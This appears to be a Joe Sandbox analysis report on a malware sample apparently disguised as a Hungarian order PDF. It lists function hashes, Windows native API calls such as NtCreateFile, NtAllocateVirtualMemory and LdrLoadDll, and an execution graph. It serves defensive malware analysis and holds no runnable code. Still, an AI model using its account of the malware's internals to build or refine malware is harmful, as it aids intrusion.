                                              • Instruction Fuzzy Hash: AD5112B6E002199FEF04CFA8E851ADDBBB5BF48354F15822AE805EB650D7349942CF54
                                              Function 33597B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                              • String ID:
                                              • API String ID: 4281723722-0
                                              • Opcode ID: 95f1ea70b76569a12ae27ecb2754ad94982e0665c439be26fc9a88995393f611
                                              • Instruction ID: 0565cedc4f39d7162b9f777302b64b970f663820f7944b41a8ab6eb43f1df0b0
                                              • Opcode Fuzzy Hash: 95f1ea70b76569a12ae27ecb2754ad94982e0665c439be26fc9a88995393f611
                                              • Instruction Fuzzy Hash: 6A3134B6E01228AFDF11EFA8E885A9DBBF1FB48721F10412AE911B7690DB355901CF54
                                              Function 335659C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: d85e5473256b00f87734cdb2317b6ec265f376465788e0113d18162bb2032f49
                                              • Instruction ID: ab309e4347d9a99e9eba7fbb25ae72dc2b74b2b55d46b4d5f2d906a477f68132
                                              • Opcode Fuzzy Hash: d85e5473256b00f87734cdb2317b6ec265f376465788e0113d18162bb2032f49
                                              • Instruction Fuzzy Hash: EB326570D40369DFEB21CF64D884BDDBBB4BB48308F4444E9D549A7681DBB49A88CF90
                                              Function 335A7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-
                                              • API String ID: 1302938615-2137968064
                                              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                              • Instruction ID: 176209eb58fb61be802fb78caac599613a13fb2298a8ef84dc911267186006fc
                                              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                              • Instruction Fuzzy Hash: EF91BA74E003159FEB16CFADE8806AEB7B5FF84761F58451AF865E72C0D7309A40A750
                                              Function 33594C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0$Flst
                                              • API String ID: 0-758220159
                                              • Opcode ID: 7e9213d55a681ab9776734a9a44f268a825c6ac2db62aa62d63747f3da20c7f9
                                              • Instruction ID: 7a3a3658d9e5996df066693a0e0cef229f12b8745ff6328fd317f10c9d8c1729
                                              • Opcode Fuzzy Hash: 7e9213d55a681ab9776734a9a44f268a825c6ac2db62aa62d63747f3da20c7f9
                                              • Instruction Fuzzy Hash: 2151ACB9E00348CFEB15CF99E48469DFBF8EF44395F5A806AD0499B254EB709D85CB80
                                              Function 335604E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • kLsE, xrefs: 33560540
                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 3356063D
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                              • API String ID: 3446177414-2547482624
                                              • Opcode ID: 65bf7d86d6d1a9d3a28469fa2fbd05b04069d5cfe547c8a2f8bf699c6f4394f2
                                              • Instruction ID: 0d130b34d056bb7261a3bc8a6e4ce56d80904fa8fd9fe2d94c831eecf9978e0d
                                              • Opcode Fuzzy Hash: 65bf7d86d6d1a9d3a28469fa2fbd05b04069d5cfe547c8a2f8bf699c6f4394f2
                                              • Instruction Fuzzy Hash: A951E0B65087429FD314DF24E440697B7E8AF84348F04683EE9EA87640E778D545CFD2
                                              Function 3355DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: 0$0
                                              • API String ID: 3446177414-203156872
                                              • Opcode ID: b53fd0b44cd770f88808a53f8f3daf822986ad33332e4f1023f67d33a2d11b3e
                                              • Instruction ID: 17ce2e5063fa6ff46eb4f6bf8a3e4699085d95fada9438206461adbf52bfc6f2
                                              • Opcode Fuzzy Hash: b53fd0b44cd770f88808a53f8f3daf822986ad33332e4f1023f67d33a2d11b3e
                                              • Instruction Fuzzy Hash: 0F418EB2A087069FE300CF28D494A4ABBE4FF88354F04492EF489DB350D771EA05CB96

                                              Execution Graph

                                              Execution Coverage:1.2%
                                              Dynamic/Decrypted Code Coverage:4.6%
                                              Signature Coverage:0%
                                              Total number of Nodes:216
                                              Total number of Limit Nodes:25
                                              execution_graph 94276 2c71ee0 94278 2c71ef9 94276->94278 94277 2c71f44 94284 2c7b950 94277->94284 94278->94277 94281 2c71f87 94278->94281 94283 2c71f8c 94278->94283 94282 2c7b950 RtlFreeHeap 94281->94282 94282->94283 94287 2c79c10 94284->94287 94286 2c71f54 94288 2c79c2d 94287->94288 94289 2c79c3e RtlFreeHeap 94288->94289 94289->94286 94290 2c71b40 94291 2c71b5c 94290->94291 94292 2c71b84 94291->94292 94293 2c71b98 94291->94293 94294 2c798a0 NtClose 94292->94294 94300 2c798a0 94293->94300 94296 2c71b8d 94294->94296 94297 2c71ba1 94303 2c7ba70 RtlAllocateHeap 94297->94303 94299 2c71bac 94301 2c798bd 94300->94301 94302 2c798ce NtClose 94301->94302 94302->94297 94303->94299 94304 2c79700 94305 2c797a4 94304->94305 94307 2c79728 94304->94307 94306 2c797ba NtReadFile 94305->94306 94309 4bb2ad0 LdrInitializeThunk 94310 2c59ef0 94311 2c5a242 94310->94311 94313 2c5a614 94311->94313 94314 2c7b5b0 94311->94314 94315 2c7b5d6 94314->94315 94320 2c54110 94315->94320 94317 2c7b5e2 94319 2c7b61b 94317->94319 94323 2c759e0 94317->94323 94319->94313 94322 2c5411d 94320->94322 94327 2c63580 94320->94327 94322->94317 94324 2c759f1 94323->94324 94326 2c758e3 94324->94326 94345 2c61d50 94324->94345 94326->94319 94328 2c6359a 94327->94328 94330 2c635b3 94328->94330 94331 2c7a310 94328->94331 94330->94322 94333 2c7a32a 94331->94333 94332 2c7a359 94332->94330 94333->94332 94338 2c78ee0 94333->94338 94336 2c7b950 RtlFreeHeap 94337 2c7a3ce 94336->94337 94337->94330 94339 2c78efd 94338->94339 94342 4bb2c0a 94339->94342 94340 2c78f29 94340->94336 94343 4bb2c1f LdrInitializeThunk 94342->94343 94344 4bb2c11 94342->94344 94343->94340 94344->94340 94346 2c61d8b 94345->94346 94361 2c68200 94346->94361 94348 2c61d93 94349 2c6206d 94348->94349 94372 2c7ba30 94348->94372 94349->94326 94351 2c61da9 94352 2c7ba30 RtlAllocateHeap 94351->94352 94353 2c61db7 94352->94353 94354 2c7ba30 RtlAllocateHeap 94353->94354 94355 2c61dc5 94354->94355 94359 2c61e62 94355->94359 94383 2c66db0 NtClose LdrInitializeThunk 94355->94383 94358 2c62022 94379 2c78320 94358->94379 94375 2c648d0 94359->94375 94362 2c6822c 94361->94362 94384 2c680f0 94362->94384 94365 2c68271 94368 2c6828d 94365->94368 94370 2c798a0 NtClose 94365->94370 94366 2c68259 94367 2c68264 94366->94367 94369 2c798a0 NtClose 94366->94369 94367->94348 94368->94348 94369->94367 94371 2c68283 94370->94371 94371->94348 94395 2c79bc0 94372->94395 94374 2c7ba4b 94374->94351 94376 2c648f4 94375->94376 94377 2c648fb 94376->94377 94378 2c64930 LdrLoadDll 94376->94378 94377->94358 94378->94377 94380 2c78331 94379->94380 94382 2c782d1 94380->94382 94398 2c62080 94380->94398 94382->94349 94383->94359 94385 2c6810a 94384->94385 94389 2c681e6 94384->94389 94390 2c78f80 94385->94390 94388 2c798a0 NtClose 94388->94389 94389->94365 94389->94366 94391 2c78f9a 94390->94391 94394 4bb35c0 LdrInitializeThunk 94391->94394 94392 2c681da 94392->94388 94394->94392 94396 2c79bda 94395->94396 94397 2c79beb RtlAllocateHeap 94396->94397 94397->94374 94414 2c684d0 94398->94414 94400 2c625f6 94400->94382 94401 2c620a0 94401->94400 94418 2c71500 94401->94418 94404 2c622b4 94426 2c7cb20 94404->94426 94405 2c620fe 94405->94400 94421 2c7c9f0 94405->94421 94408 2c622c9 94409 2c62460 94408->94409 94411 2c62316 94408->94411 94432 2c75a70 94408->94432 94440 2c60ba0 94409->94440 94411->94400 94412 2c75a70 11 API calls 94411->94412 94413 2c60ba0 LdrInitializeThunk 94411->94413 94412->94411 94413->94411 94415 2c684dd 94414->94415 94416 2c68502 94415->94416 94417 2c684fb SetErrorMode 94415->94417 94416->94401 94417->94416 94443 2c7b8c0 94418->94443 94420 2c71521 94420->94405 94422 2c7ca06 94421->94422 94423 2c7ca00 94421->94423 94424 2c7ba30 RtlAllocateHeap 94422->94424 94423->94404 94425 2c7ca2c 94424->94425 94425->94404 94427 2c7ca90 94426->94427 94428 2c7ba30 RtlAllocateHeap 94427->94428 94430 2c7caed 94427->94430 94429 2c7caca 94428->94429 94431 2c7b950 RtlFreeHeap 94429->94431 94430->94408 94431->94430 94433 2c75a22 94432->94433 94433->94432 94434 2c75a98 94433->94434 94437 2c759e0 94433->94437 94436 2c75af3 94434->94436 94450 2c65fd0 94434->94450 94436->94408 94438 2c61d50 11 API calls 94437->94438 94439 2c758e3 94437->94439 94438->94439 94439->94408 94494 2c79b30 94440->94494 94446 2c79a10 94443->94446 94445 2c7b8f1 94445->94420 94447 2c79aa5 94446->94447 94449 2c79a3b 94446->94449 94448 2c79abb NtAllocateVirtualMemory 94447->94448 94448->94445 94449->94445 94451 2c65ff6 94450->94451 94456 2c6600e 94451->94456 94482 2c63380 NtClose LdrInitializeThunk 94451->94482 94453 2c6601d 94454 2c662bc 94453->94454 94455 2c7cb20 2 API calls 94453->94455 94454->94436 94455->94456 94456->94454 94457 2c6617e 94456->94457 94458 2c78ee0 LdrInitializeThunk 94456->94458 94489 2c62610 LdrInitializeThunk 94457->94489 94459 2c660cf 94458->94459 94459->94457 94464 2c660db 94459->94464 94461 2c661a6 94462 2c661b1 94461->94462 94490 2c65f40 NtClose 94461->94490 94466 2c798a0 NtClose 94462->94466 94464->94454 94465 2c66127 94464->94465 94483 2c790b0 94464->94483 94469 2c798a0 NtClose 94465->94469 94470 2c661bb 94466->94470 94467 2c661d3 94467->94462 94471 2c661da 94467->94471 94473 2c66144 94469->94473 94470->94436 94476 2c661f2 94471->94476 94491 2c65ec0 LdrInitializeThunk 94471->94491 94473->94454 94488 2c61110 LdrLoadDll 94473->94488 94475 2c66174 94475->94436 94477 2c798a0 NtClose 94476->94477 94478 2c6628f 94477->94478 94479 2c798a0 NtClose 94478->94479 94480 2c66299 94479->94480 94480->94454 94492 2c61110 LdrLoadDll 94480->94492 94482->94453 94484 2c79161 94483->94484 94486 2c790df 94483->94486 94493 4bb2d10 LdrInitializeThunk 94484->94493 94485 2c791a6 94485->94465 94486->94465 94488->94475 94489->94461 94490->94467 94491->94476 94492->94454 94493->94485 94495 2c79b4a 94494->94495 94498 4bb2c70 LdrInitializeThunk 94495->94498 94496 2c60bc2 94496->94411 94498->94496 94499 2c62a90 94500 2c62ab5 94499->94500 94501 2c648d0 LdrLoadDll 94500->94501 94502 2c62aeb 94501->94502 94504 2c62b13 94502->94504 94505 2c66650 94502->94505 94506 2c66683 94505->94506 94507 2c666a7 94506->94507 94512 2c79400 94506->94512 94507->94504 94509 2c666ca 94509->94507 94510 2c798a0 NtClose 94509->94510 94511 2c6674a 94510->94511 94511->94504 94513 2c7941a 94512->94513 94516 4bb2ca0 LdrInitializeThunk 94513->94516 94514 2c79446 94514->94509 94516->94514 94517 2c67110 94518 2c6713a 94517->94518 94521 2c682a0 94518->94521 94520 2c67164 94522 2c682bd 94521->94522 94528 2c78fd0 94522->94528 94524 2c6830d 94525 2c68314 94524->94525 94526 2c790b0 LdrInitializeThunk 94524->94526 94525->94520 94527 2c6833d 94526->94527 94527->94520 94529 2c79068 94528->94529 94530 2c78ff8 94528->94530 94533 4bb2f30 LdrInitializeThunk 94529->94533 94530->94524 94531 2c790a1 94531->94524 94533->94531 94534 2c78e90 94535 2c78ead 94534->94535 94538 4bb2df0 LdrInitializeThunk 94535->94538 94536 2c78ed5 94538->94536 94539 2c79590 94540 2c79647 94539->94540 94542 2c795bf 94539->94542 94541 2c7965d NtCreateFile 94540->94541 94543 2c7ca50 94544 2c7b950 RtlFreeHeap 94543->94544 94545 2c7ca65 94544->94545

                                              Executed Functions

                                              Function 02C59EF0 Relevance: 32.9, Strings: 26, Instructions: 386COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 2c59ef0-2c5a240 1 2c5a251-2c5a25a 0->1 2 2c5a25c-2c5a26c 1->2 3 2c5a26e 1->3 2->1 5 2c5a275-2c5a27c 3->5 6 2c5a2a6-2c5a2b7 5->6 7 2c5a27e-2c5a290 5->7 8 2c5a2c8-2c5a2d4 6->8 9 2c5a297-2c5a299 7->9 10 2c5a292-2c5a296 7->10 13 2c5a2e6 8->13 14 2c5a2d6-2c5a2dc 8->14 11 2c5a2a4 9->11 12 2c5a29b-2c5a2a1 9->12 10->9 11->5 12->11 17 2c5a2ed-2c5a306 13->17 15 2c5a2e4 14->15 16 2c5a2de-2c5a2e1 14->16 15->8 16->15 17->17 19 2c5a308-2c5a311 17->19 20 2c5a317-2c5a323 19->20 21 2c5a552-2c5a55c 19->21 23 2c5a325-2c5a340 20->23 24 2c5a342-2c5a34b 20->24 22 2c5a56d-2c5a576 21->22 25 2c5a586-2c5a58a 22->25 26 2c5a578-2c5a584 22->26 23->20 27 2c5a367-2c5a37a 24->27 28 2c5a34d-2c5a365 24->28 30 2c5a596-2c5a5a0 25->30 31 2c5a58c-2c5a593 25->31 26->22 29 2c5a38b-2c5a394 27->29 28->24 33 2c5a3a4-2c5a3ae 29->33 34 2c5a396-2c5a3a2 29->34 35 2c5a5b1-2c5a5bd 30->35 31->30 36 2c5a3bf-2c5a3c8 33->36 34->29 38 2c5a5d4-2c5a5db 35->38 39 2c5a5bf-2c5a5d2 35->39 43 2c5a3e0-2c5a3ef 36->43 44 2c5a3ca-2c5a3d3 36->44 40 2c5a614-2c5a61b 38->40 41 2c5a5dd-2c5a5e1 38->41 39->35 47 2c5a652-2c5a65c 40->47 48 2c5a61d-2c5a650 40->48 45 2c5a5e3-2c5a60d 41->45 46 2c5a60f call 2c7b5b0 41->46 51 2c5a3f5-2c5a3ff 43->51 52 2c5a4bf-2c5a4d3 43->52 49 2c5a3d5-2c5a3db 44->49 50 2c5a3de 44->50 45->41 46->40 54 2c5a66d-2c5a676 47->54 48->40 49->50 50->36 57 2c5a410-2c5a41c 51->57 56 2c5a4e4-2c5a4f0 52->56 58 2c5a68e-2c5a697 54->58 59 2c5a678-2c5a681 54->59 60 2c5a4f2-2c5a4fb 56->60 61 2c5a508-2c5a512 56->61 62 2c5a42d-2c5a437 57->62 63 2c5a41e-2c5a42b 57->63 71 2c5a6b6-2c5a6c0 58->71 72 2c5a699-2c5a6b4 58->72 66 2c5a683-2c5a689 59->66 67 2c5a68c 59->67 68 2c5a506 60->68 69 2c5a4fd-2c5a503 60->69 64 2c5a523-2c5a52f 61->64 65 2c5a448-2c5a454 62->65 63->57 73 2c5a531-2c5a53d 64->73 74 2c5a54d 64->74 75 2c5a456-2c5a468 65->75 76 2c5a46a-2c5a474 65->76 66->67 67->54 68->56 69->68 72->58 79 2c5a53f-2c5a545 73->79 80 2c5a54b 73->80 74->19 75->65 82 2c5a485-2c5a48e 76->82 79->80 80->64 84 2c5a490-2c5a49d 82->84 85 2c5a49f-2c5a4b8 82->85 84->82 85->85 87 2c5a4ba 85->87 87->21
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: #$&J$0$4$4$4$$<;$<m$N=$NI$P$SK$Y$c>$d$e$$jB$jG$l$n$sn$u$xs$z^jB$#$~
                                              • API String ID: 0-1260726500
                                              • Opcode ID: fd0e4420c71a061ac1762caaa35ac530deed8dac59a1d8e6791a24b245260991
                                              • Instruction ID: 619b47f402d757c5a94209d8767fc7a1d004c5b0ee63827cdee6b6b71cf385fd
                                              • Opcode Fuzzy Hash: fd0e4420c71a061ac1762caaa35ac530deed8dac59a1d8e6791a24b245260991
                                              • Instruction Fuzzy Hash: 202293B0D04269CBEB24CF46C994BDDBBB1BF44308F1082D9D549AB280DB759AC9DF64
                                              Function 02C79590 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02C7968E
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 29d2f3eae3eecdb957aa4a0268a62ce3f47417c7960bc593d27c9860f9b3b426
                                              • Instruction ID: 2ad61e28d250789049778cc727a8dd50369e222da0c44166d96316742e1637ba
                                              • Opcode Fuzzy Hash: 29d2f3eae3eecdb957aa4a0268a62ce3f47417c7960bc593d27c9860f9b3b426
                                              • Instruction Fuzzy Hash: DA31AEB5A01248AFCB14DF98D881EEEB7B9EF8C314F108619F919A7340D770A951CFA5
                                              Function 02C79700 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02C797E3
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 8bc8b28d2847786c78e31c431c3ad13a4c80f281eaa87e5c5c36adec1351f4a1
                                              • Instruction ID: 8a0172694cf9f7eea81deb75ae2aced6a796f250cb3a329561f2daa2e22dac33
                                              • Opcode Fuzzy Hash: 8bc8b28d2847786c78e31c431c3ad13a4c80f281eaa87e5c5c36adec1351f4a1
                                              • Instruction Fuzzy Hash: E931E6B5A00209AFCB14DF98D981EEFB7B9EF88314F008219FD19A7240D770A951CFA5
                                              Function 02C79A10 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(02C620FE,?,02C7838E,00000000,00000004,00003000,?,?,?,?,?,02C7838E,02C620FE,02C7838E,89CC4589,02C620FE), ref: 02C79AD8
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 00116b90dda962f07f70a53560b38c2d7b5eca92cfcef9ae4e0bd317f9c39fc6
                                              • Instruction ID: fe3eb8ff894efb04406937d037da39f07365bf7e69c801767842aa4a682ebe51
                                              • Opcode Fuzzy Hash: 00116b90dda962f07f70a53560b38c2d7b5eca92cfcef9ae4e0bd317f9c39fc6
                                              • Instruction Fuzzy Hash: 592108B5A00209AFDB14DF98D841FAFB7B9EF88310F008119FE19A7240D770A951CFA5
                                              Function 02C798A0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 297 2c798a0-2c798dc call 2c514a0 call 2c7aaf0 NtClose
                                              APIs
                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02C798D7
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: cd6213df5cb1db09666ab31476bb7559ec7a4f265cb6d7c6312368f982f7f8bd
                                              • Instruction ID: 320621532974492f49160aefbfe28e3272e88fdafaf7e6b67c31bd809ef0eff6
                                              • Opcode Fuzzy Hash: cd6213df5cb1db09666ab31476bb7559ec7a4f265cb6d7c6312368f982f7f8bd
                                              • Instruction Fuzzy Hash: 3DE046322402147BD620EA5ACC40F9B77ADDBC5764F004015FA08A7241CAB1B9418BB4
                                              Function 04BB2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 62c631dc8b7a96b2383d4c2c544fbf4b12eb4da6f50761440250741d98972f91
                                              • Instruction ID: 9f8bea8f1d70daa21d8e3516a18f79438732c08dc67093a16ba90f7567088959
                                              • Opcode Fuzzy Hash: 62c631dc8b7a96b2383d4c2c544fbf4b12eb4da6f50761440250741d98972f91
                                              • Instruction Fuzzy Hash: CE90023220140402F100759954486460005CBE0306F55D055B5425556EC666D9926131
                                              Function 04BB2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 6c22168b7453dbe8e2616dc4b5a33a8b1f5d516ac122e06ddfcc707dc7e727ba
                                              • Instruction ID: 579b2acc7a6f4e6c1b50e0b8aeff1702f84d31be1219898c6c4a3104b0263a42
                                              • Opcode Fuzzy Hash: 6c22168b7453dbe8e2616dc4b5a33a8b1f5d516ac122e06ddfcc707dc7e727ba
                                              • Instruction Fuzzy Hash: 9F90023220148802F1107159844474A0005CBD0306F59C455B4825659D8696D9927121
                                              Function 04BB2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 1c8f7ac18fc1b359dc676a7870e90773ada30f0c8ccd04b779b316b6e7df336b
                                              • Instruction ID: 2024d99c43a797471233114891ac649aaf59eabf07304c38615d6564e4d6b22f
                                              • Opcode Fuzzy Hash: 1c8f7ac18fc1b359dc676a7870e90773ada30f0c8ccd04b779b316b6e7df336b
                                              • Instruction Fuzzy Hash: 1E90023220140413F111715945447070009CBD0246F95C456B0825559D9657DA53A121
                                              Function 04BB2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
